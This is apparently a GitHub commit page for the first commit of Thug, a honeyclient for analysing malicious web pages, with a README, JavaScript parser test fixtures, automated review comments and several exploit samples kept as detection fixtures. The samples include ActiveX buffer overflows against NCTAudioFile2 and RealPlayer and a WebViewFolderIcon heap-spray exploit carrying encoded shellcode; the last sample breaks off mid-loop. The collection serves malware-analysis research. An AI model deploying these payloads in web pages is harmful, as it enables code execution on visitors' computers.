
First commit

buffer committed May 8, 2011
0 parents commit 82c455dbe44bc1688622a1b606ebac7198b8c2e7
Showing with 38,743 additions and 0 deletions.
  1. +340 −0 COPYING
  2. +36 −0 README
  3. +15 −0 samples/AST/test1.html
  4. +20 −0 samples/AST/test2.html
  5. +23 −0 samples/AST/test3.html
  6. +51 −0 samples/AST/test99.html
  7. +18 −0 samples/exploits/22196.html
  8. +28 −0 samples/exploits/22811_Elazar.html
  9. +67 −0 samples/exploits/2448.html
  10. +47 −0 samples/exploits/2575.html
  11. +47 −0 samples/exploits/2mix.html
  12. +38 −0 samples/exploits/3420.html
  13. BIN samples/exploits/36488084.sc
  14. BIN samples/exploits/39973780.sc
  15. +44 −0 samples/exploits/4042.html
  16. +32 −0 samples/exploits/4043.html
  17. +24 −0 samples/exploits/4148.html
  18. +76 −0 samples/exploits/4149.html
  19. +131 −0 samples/exploits/4158.html
  20. +40 −0 samples/exploits/4226.html
  21. +19 −0 samples/exploits/4230.html
  22. +17 −0 samples/exploits/4237.html
  23. +50 −0 samples/exploits/4250.html
  24. +49 −0 samples/exploits/4351.html
  25. +56 −0 samples/exploits/4420.html
  26. +29 −0 samples/exploits/4427.html
  27. +44 −0 samples/exploits/4594.html
  28. +20 −0 samples/exploits/4613.html
  29. +59 −0 samples/exploits/4663.html
  30. +39 −0 samples/exploits/4829.html
  31. +30 −0 samples/exploits/4869.html
  32. +44 −0 samples/exploits/4874.html
  33. +33 −0 samples/exploits/4875.html
  34. +71 −0 samples/exploits/4894.html
  35. +31 −0 samples/exploits/4903.html
  36. +35 −0 samples/exploits/4909.html
  37. +79 −0 samples/exploits/4918.html
  38. +82 −0 samples/exploits/4932.html
  39. +120 −0 samples/exploits/4967.html
  40. +21 −0 samples/exploits/4974.html
  41. +120 −0 samples/exploits/4979.html
  42. +120 −0 samples/exploits/4982.html
  43. +33 −0 samples/exploits/4986.html
  44. +118 −0 samples/exploits/4987.html
  45. +121 −0 samples/exploits/5025.html
  46. +49 −0 samples/exploits/5043.html
  47. +37 −0 samples/exploits/5045.html
  48. +132 −0 samples/exploits/5049.html
  49. +121 −0 samples/exploits/5051.html
  50. +119 −0 samples/exploits/5052.html
  51. +37 −0 samples/exploits/5153.html
  52. +31 −0 samples/exploits/5188.html
  53. +118 −0 samples/exploits/5190.html
  54. +75 −0 samples/exploits/5193.html
  55. +122 −0 samples/exploits/5205.html
  56. +22 −0 samples/exploits/5217.html
  57. +70 −0 samples/exploits/5225.html
  58. +69 −0 samples/exploits/5264.html
  59. +69 −0 samples/exploits/5271.html
  60. +50 −0 samples/exploits/5272.html
  61. +355 −0 samples/exploits/55875.html
  62. +69 −0 samples/exploits/ARCserve_AddColumn_BoF.html
  63. +101 −0 samples/exploits/AnswerWorks.htm
  64. +15 −0 samples/exploits/BaiduBar.htm
  65. +20 −0 samples/exploits/BitDefender.htm
  66. +33 −0 samples/exploits/CABrightStor.htm
  67. +9 −0 samples/exploits/CVE-2008-1309-Real.html
  68. +11 −0 samples/exploits/Comodo.htm
  69. +64 −0 samples/exploits/ConnectAndEnterRoom.htm
  70. +27 −0 samples/exploits/CreativeSoftAttack.htm
  71. +50 −0 samples/exploits/DLinkMPEG.htm
  72. +18 −0 samples/exploits/DPClient.htm
  73. +20 −0 samples/exploits/DVRHOSTWeb.htm
  74. +25 −0 samples/exploits/DirectShow.htm
  75. +16 −0 samples/exploits/DivX.htm
  76. +142 −0 samples/exploits/Domino.htm
  77. +107 −0 samples/exploits/FileUploader.htm
  78. +62 −0 samples/exploits/GLIEDown2.htm
  79. +19 −0 samples/exploits/GatewayWeblaunch.htm
  80. +15 −0 samples/exploits/GomWeb.htm
  81. +19 −0 samples/exploits/HPInfo_GetRegValue.htm
  82. +29 −0 samples/exploits/HPInfo_LaunchApp.htm
  83. +23 −0 samples/exploits/HPInfo_SetRegValue.htm
  84. +35 −0 samples/exploits/IMWebControl.htm
  85. +29 −0 samples/exploits/JetAudioDownloadFromMusicStore.htm
  86. +9 −0 samples/exploits/Kingsoft.htm
  87. +13 −0 samples/exploits/MacrovisionFlexNet.htm
  88. +59 −0 samples/exploits/MicrosoftWorks7Attack.htm
  89. +113 −0 samples/exploits/Move.htm
  90. +110 −0 samples/exploits/MyspaceUploader.htm
  91. +54 −0 samples/exploits/NCTAudioFile2.htm
  92. +23 −0 samples/exploits/NamoInstaller.htm
  93. +93 −0 samples/exploits/NeoTracePro.htm
  94. +32 −0 samples/exploits/NessusScanCtrl.htm
  95. +58 −0 samples/exploits/OurgameGLWorld.htm
  96. +16 −0 samples/exploits/OurgameGLWorld.html
  97. +57 −0 samples/exploits/PPlayer.htm
  98. +61 −0 samples/exploits/PTZCamPanel.htm
  99. +301 −0 samples/exploits/Pps.html
  100. +108 −0 samples/exploits/QuantumStreaming.htm
  101. +37 −0 samples/exploits/RDSDataSpace.htm
  102. +16 −0 samples/exploits/RediffBolDownloaderAttack.htm
  103. +14 −0 samples/exploits/RegistryPro.htm
  104. +50 −0 samples/exploits/RtspVaPgCtrl.htm
  105. +13 −0 samples/exploits/SSReaderPdg2_LoadPage.htm
  106. +43 −0 samples/exploits/SSReaderPdg2_Register.htm
  107. +11 −0 samples/exploits/SinaDLoader.htm
  108. +24 −0 samples/exploits/SonicWallNetExtenderAddRouteEntry.htm
  109. +32 −0 samples/exploits/StormConfig.htm
  110. +56 −0 samples/exploits/StreamAudioChainCast.htm
  111. +121 −0 samples/exploits/SymantecBackupExec.htm
  112. +54 −0 samples/exploits/Toshiba.htm
  113. +15 −0 samples/exploits/UUSeeUpdate.htm
  114. +23 −0 samples/exploits/UniversalUpload.htm
  115. +37 −0 samples/exploits/VLC.htm
  116. +64 −0 samples/exploits/WMEncProfileManager.htm
  117. +53 −0 samples/exploits/WinZip.htm
  118. +20 −0 samples/exploits/Xupload.htm
  119. +118 −0 samples/exploits/YahooJukebox.htm
  120. +48 −0 samples/exploits/YahooMessengerYVerInfo.htm
  121. +43 −0 samples/exploits/YahooMessengerYwcvwr_GetComponentVersion.htm
  122. +31 −0 samples/exploits/YahooMessengerYwcvwr_server.htm
  123. +33 −0 samples/exploits/ZenturiProgramCheckerAttack.htm
  124. +19 −0 samples/exploits/aol_ampx.html
  125. +1 −0 samples/exploits/bindshell.sc
  126. +23 −0 samples/exploits/domino.html
  127. +34 −0 samples/exploits/gom.html
  128. +32 −0 samples/exploits/hpinfo.html
  129. +36 −0 samples/exploits/hpinfo1.html
  130. +28 −0 samples/exploits/hpinfo2.html
  131. +19 −0 samples/exploits/hpinfo3.html
  132. +27 −0 samples/exploits/hpupdate1.html
  133. +87 −0 samples/exploits/hpupdate2.html
  134. +33 −0 samples/exploits/inner_html_example.html
  135. +168 −0 samples/exploits/intuit.html
  136. +24 −0 samples/exploits/ms09002-mod.html
  137. +10 −0 samples/exploits/msrichtxt.html
  138. +66 −0 samples/exploits/qvod.html
  139. +26 −0 samples/exploits/qvod.js
  140. +52 −0 samples/exploits/qvodctl-2.html
  141. +11 −0 samples/exploits/qvodctl.html
  142. +42 −0 samples/exploits/qvodsrc.html
  143. +87 −0 samples/exploits/realplayer-mod.html
  144. +110 −0 samples/exploits/rgod_imesh.html
  145. +1 −0 samples/exploits/runcalc.sc
  146. +58 −0 samples/exploits/show-283-1.html
  147. +42 −0 samples/exploits/ssreader2.html
  148. +48 −0 samples/exploits/ssreader_0day.html
  149. +42 −0 samples/exploits/ssreader_noplus.html
  150. +15 −0 samples/exploits/storm_URL.htm
  151. +15 −0 samples/exploits/storm_advancedOpen.htm
  152. +15 −0 samples/exploits/storm_backImage.htm
  153. +15 −0 samples/exploits/storm_isDVDPath.htm
  154. +23 −0 samples/exploits/storm_nov10.html
  155. +15 −0 samples/exploits/storm_rawParse.htm
  156. +15 −0 samples/exploits/storm_titleImage.htm
  157. +79 −0 samples/exploits/stormplayer.html
  158. +227 −0 samples/exploits/testEvents.html
  159. +63 −0 samples/exploits/toshiba.html
  160. +100 −0 samples/exploits/xupload-2.html
  161. +22 −0 samples/exploits/xupload.html
  162. +185 −0 src/AST/AST.py
  163. +179 −0 src/AST/JavaScript.tokens
  164. +6,039 −0 src/AST/JavaScriptLexer.py
  165. +15,814 −0 src/AST/JavaScriptParser.py
  166. 0 src/AST/__init__.py
  167. +141 −0 src/ActiveX/ActiveX.py
  168. +213 −0 src/ActiveX/CLSID.py
  169. 0 src/ActiveX/__init__.py
  170. +4 −0 src/ActiveX/modules/AOLAttack.py
  171. +7 −0 src/ActiveX/modules/AcroPDF.py
  172. +22 −0 src/ActiveX/modules/AdodbStream.py
  173. +14 −0 src/ActiveX/modules/AnswerWork.py
  174. +18 −0 src/ActiveX/modules/AnswerWorks.py
  175. +8 −0 src/ActiveX/modules/AolAmpX.py
  176. +9 −0 src/ActiveX/modules/BaiduBar.py
  177. +8 −0 src/ActiveX/modules/BitDefender.py
  178. +8 −0 src/ActiveX/modules/CABrightStor.py
  179. +8 −0 src/ActiveX/modules/CGAgent.py
  180. +7 −0 src/ActiveX/modules/Comodo.py
  181. +8 −0 src/ActiveX/modules/ConnectAndEnterRoom.py
  182. +4 −0 src/ActiveX/modules/CreativeSoftAttack.py
  183. +8 −0 src/ActiveX/modules/DLinkMPEG.py
  184. +9 −0 src/ActiveX/modules/DPClient.py
  185. +8 −0 src/ActiveX/modules/DVRHOSTWeb.py
  186. +7 −0 src/ActiveX/modules/DirectShow.py
  187. +8 −0 src/ActiveX/modules/DivX.py
  188. +19 −0 src/ActiveX/modules/Domino.py
  189. +11 −0 src/ActiveX/modules/EnjoySAP.py
  190. +13 −0 src/ActiveX/modules/FacebookPhotoUploader.py
  191. +9 −0 src/ActiveX/modules/FileUploader.py
  192. +2 −0 src/ActiveX/modules/Flash.py
  193. +7 −0 src/ActiveX/modules/GLIEDown2.py
  194. +10 −0 src/ActiveX/modules/GatewayWeblaunch.py
  195. +8 −0 src/ActiveX/modules/GomWeb.py
  196. +29 −0 src/ActiveX/modules/HPInfo.py
  197. +8 −0 src/ActiveX/modules/ICQToolbar.py
  198. +13 −0 src/ActiveX/modules/IMWebControl.py
  199. +7 −0 src/ActiveX/modules/JetAudioDownloadFromMusicStore.py
  200. +8 −0 src/ActiveX/modules/Kingsoft.py
  201. +10 −0 src/ActiveX/modules/MSRICHTXT.py
  202. +9 −0 src/ActiveX/modules/MSVFP.py
  203. +37 −0 src/ActiveX/modules/MacrovisionFlexNet.py
  204. +28 −0 src/ActiveX/modules/Makefile.py
  205. +4 −0 src/ActiveX/modules/MicrosoftWorks7Attack.py
  206. +34 −0 src/ActiveX/modules/MicrosoftXMLHTTP.py
  207. +8 −0 src/ActiveX/modules/Move.py
  208. +9 −0 src/ActiveX/modules/MyspaceUploader.py
  209. +8 −0 src/ActiveX/modules/NCTAudioFile2.py
  210. +10 −0 src/ActiveX/modules/NamoInstaller.py
  211. +9 −0 src/ActiveX/modules/NeoTracePro.py
  212. +39 −0 src/ActiveX/modules/NessusScanCtrl.py
  213. +13 −0 src/ActiveX/modules/OurgameGLWorld.py
  214. +28 −0 src/ActiveX/modules/PDFAcroPDF.py
  215. +8 −0 src/ActiveX/modules/PDFFtpDownloadFile.py
  216. +9 −0 src/ActiveX/modules/PDFOpenPDF.py
  217. +13 −0 src/ActiveX/modules/PDFSavaAsBMPWMF.py
  218. +8 −0 src/ActiveX/modules/PDFextractPagesToFile.py
  219. +7 −0 src/ActiveX/modules/PDFsavePageAsBitmap.py
  220. +8 −0 src/ActiveX/modules/PDFsetview.py
  221. +18 −0 src/ActiveX/modules/PPlayer.py
  222. +8 −0 src/ActiveX/modules/PTZCamPanel.py
  223. +8 −0 src/ActiveX/modules/QuantumStreaming.py
  224. +9 −0 src/ActiveX/modules/QvodCtrl.py
  225. +7 −0 src/ActiveX/modules/RDSDataSpace.py
  226. +26 −0 src/ActiveX/modules/RealPlayer.py
  227. +4 −0 src/ActiveX/modules/RediffBolDownloaderAttack.py
  228. +14 −0 src/ActiveX/modules/RegistryPro.py
  229. +9 −0 src/ActiveX/modules/RisingScanner.py
  230. +8 −0 src/ActiveX/modules/RtspVaPgCtrl.py
  231. +13 −0 src/ActiveX/modules/SSReaderPdg2.py
  232. +6 −0 src/ActiveX/modules/ShellApplication.py
  233. +5 −0 src/ActiveX/modules/Shockwave.py
  234. +7 −0 src/ActiveX/modules/ShockwaveFlash9.py
  235. +8 −0 src/ActiveX/modules/SinaDLoader.py
  236. +39 −0 src/ActiveX/modules/SnapshotViewer.py
  237. +11 −0 src/ActiveX/modules/SonicWallNetExtenderAddRouteEntry.py
  238. +13 −0 src/ActiveX/modules/Spreadsheet.py
  239. +8 −0 src/ActiveX/modules/StormConfig.py
  240. +8 −0 src/ActiveX/modules/StreamAudioChainCast.py
  241. +41 −0 src/ActiveX/modules/StromMps.py
  242. +23 −0 src/ActiveX/modules/SymantecBackupExec.py
  243. +13 −0 src/ActiveX/modules/Toshiba.py
  244. +7 −0 src/ActiveX/modules/UUSeeUpdate.py
  245. +7 −0 src/ActiveX/modules/UniversalUpload.py
  246. +18 −0 src/ActiveX/modules/VLC.py
  247. +8 −0 src/ActiveX/modules/WMEncProfileManager.py
  248. +11 −0 src/ActiveX/modules/WebViewFolderIcon.py
  249. +8 −0 src/ActiveX/modules/WinZip.py
  250. +13 −0 src/ActiveX/modules/XUpload.py
  251. +18 −0 src/ActiveX/modules/YahooJukebox.py
  252. +6 −0 src/ActiveX/modules/YahooMessengerCyft.py
  253. +13 −0 src/ActiveX/modules/YahooMessengerYVerInfo.py
  254. +26 −0 src/ActiveX/modules/YahooMessengerYwcvwr.py
  255. +12 −0 src/ActiveX/modules/ZenturiProgramCheckerAttack.py
  256. +97 −0 src/DOM/DFT.py
  257. +82 −0 src/DOM/History.py
  258. +77 −0 src/DOM/Location.py
  259. +221 −0 src/DOM/Navigator.py
  260. +84 −0 src/DOM/Personality.py
  261. +66 −0 src/DOM/Plugins.py
  262. +86 −0 src/DOM/Screen.py
  263. +861 −0 src/DOM/Window.py
  264. 0 src/DOM/__init__.py
  265. +1,551 −0 src/DOM/w3c.py
  266. +72 −0 src/Debugger/Debugger.py
  267. +25 −0 src/Debugger/Global.py
  268. +71 −0 src/Debugger/Shellcode.py
  269. 0 src/Debugger/__init__.py
  270. +2,798 −0 src/Debugger/d8.js
  271. +249 −0 src/PDF/PDFAnalyzer.py
  272. 0 src/PDF/__init__.py
  273. +27 −0 src/thug.py
340 COPYING

Large diffs are not rendered by default.

36 README
@@ -0,0 +1,36 @@
+
+Thug
+====
+
+
+Requirements
+============
+
+- Python 2.5 or later
+ http://www.python.org/
+- Google V8
+ http://code.google.com/p/v8/
+- PyV8
+ http://code.google.com/p/pyv8/
+- Libemu
+ http://libemu.carnivore.it/
+- Pylibemu
+ https://github.com/buffer/pylibemu
+
+
+Installation
+============
+
+
+Usage
+=====
+
+
+License information
+===================
+
+Copyright (C) 2011 Angelo Dell'Aera <buffer@antifork.org>
+
+License: GNU Lesser General Public License, version 3 or later; see COPYING.txt
+ included in this archive for details.
+
@@ -0,0 +1,15 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+var s = "foo";
+var i = 10;
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
@@ -0,0 +1,20 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
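Review bot: The `<p>` line in the body still reads `AST Test 1`, the same text as the previous fixture, although going by the file list this 20-line hunk appears to be samples/AST/test2.html; `<p>AST Test 2</p>` would let a reader of parser output tell the two samples apart. A one-line HTML comment above the `<script>` element naming the construct under test, for example `<!-- function declaration + call -->`, would also help, since nothing in the file says what the AST walker is expected to report.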
@@ -0,0 +1,23 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 0;
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+</body>
+</html>
@@ -0,0 +1,51 @@
+<html>
+<head>
+
+<title>onload test</title>
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+ var j = 0;
+ var ar = Array('a', 'b', 'c');
+ s += "bar";
+ i = i - 6;
+
+ if (i > 100) {
+ alert("Mmmmh");
+ }
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+
+ do {
+ s += "b";
+ j += 2;
+ i--;
+ } while (i > 1);
+
+ while (t > 0) {
+ s += "c";
+ t--;
+ }
+
+ for (a in ar) {
+ alert(a);
+ }
+
+ alert(s);
+ return 0;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>The load event fires when the document has finished loading!</p>
+</body>
+</html>
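Review bot: The title `onload test` and the closing paragraph about the load event describe behaviour this fixture does not have: no `onload` handler is registered, and `my_func(3)` is called inline from the script in the head. Either retitle it for what it covers (if, for, do-while, while and for-in statements) or attach the call with `<body onload="my_func(3)">`. Separately, `for (a in ar)` assigns an undeclared `a`, which becomes an implicit global; if that is deliberate coverage for the AST walker it deserves a comment, otherwise `for (var a in ar)`.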
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title> PoC 79 Exe's / IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w By InTeL </title>
+<!-- via http://downloads.securityfocus.com/vulnerabilities/exploits/22196.c -->
+</head>
+
+<body>
+<object classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" id="pwnage">
+</object>
+<script>
+
+pwnage.SetFormatLikeSample("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^Êÿ|ëYëèøÿÿÿIIIIIIIIIIIIIIIIIQZ7jJXP0B1ABkBAZB2BA2AA0AAX8BBPuzIYlm81T7pePUPLKG55lLKQlC5RXs1jOLKBoUHnkaOQ0TAzKsyLKUdNkwqZN4qiPLYnLK4o044VgjajjFmdAO2ZKl4Uk1D4dFd0uKUNkaOEtEQzKpfnkvlbkNkSo5LuQjKNkeLnkVaXkk9QLDdc4iS7AIPu4nkQPDpk5YPrXdLNkaPflNkPpELnMLKCXwxjKEYlKmPLpS0S0uPLK3XElcofQHvu0QFlIL8ncO0akRpbHXoxNm0u0bHNxinNjDNpWkOKWU3rAPl0cFNCUT8e5C0J")
+
+</script>
+</html>
+</body>
+
+
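Review bot: The string passed to `SetFormatLikeSample` contains raw non-ASCII bytes after the run of `A`s and the page declares no charset, so the bytes an analyzer sees depend on how the file is decoded and on any encoding or line-ending normalisation applied by Git or an editor. For a detection fixture that makes results hard to reproduce; treating the directory as binary in `.gitattributes` (`samples/exploits/* -text`) and recording an expected digest per sample would pin the content. The closing tags are also out of order, `</html>` before `</body>`, which is worth a comment if it is kept from the original sample on purpose.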
@@ -0,0 +1,28 @@
+<!--
+written by e.b.
+-->
+<html>
+ <head>
+ <script language="JavaScript" DEFER>
+ function Check() {
+ var s = "AAAA";
+
+ while (s.length < 999999) s=s+s;
+
+ var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
+
+
+ obj.Import(s);
+ obj.PlayerProperty(s);
+
+
+ }
+ </script>
+
+ </head>
+ <body onload="JavaScript: return Check();">
+
+ </body>
+</html>
+
+
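Review bot: This sample's only header is `written by e.b.`, so nothing in the file tells a maintainer which advisory or product version it represents; the 22196 sample above cites its source in an HTML comment and this one should do the same. The two hunks further down, the one ending in `//Sebug.net` and the one ending in the `WML()||SS()` call, have no header at all. A comment such as `<!-- source: <ADVISORY-URL>; control: IERPCTL.IERPCTL; expected analyzer result: <EXPECTED-FINDING> -->` would make each fixture self-describing for whoever writes the detection test.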
@@ -0,0 +1,67 @@
+<!--
+
+..::[ jamikazu presents ]::..
+
+Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
+Works on all Windows XP versions including SP2
+
+Author: jamikazu
+Mail: jamikazu@gmail.com
+
+Bug discovered by Computer H D Moore (http://www.metasploit.com)
+
+Credit: metasploit, SkyLined
+
+invokes calc.exe if successful
+
+-->
+
+<HTML>
+<BODY>
+<SCRIPT language="javascript">
+
+ var heapSprayToAddress = 0x05050505;
+ var payLoadCode = unescape(
+ "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
+ "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
+ "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
+ "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
+ "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
+ "%uFF57%u63E7%u6C61%u0063");
+ var heapBlockSize = 0x400000;
+ var payLoadSize = payLoadCode.length * 2;
+ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+ var spraySlide = unescape("%u0505%u0505");
+ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+ memory = new Array();
+
+ for (i=0;i<heapBlocks;i++)
+ {
+ memory[i] = spraySlide + payLoadCode;
+ }
+
+ for ( i = 0 ; i < 128 ; i++)
+ {
+ try{
+ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
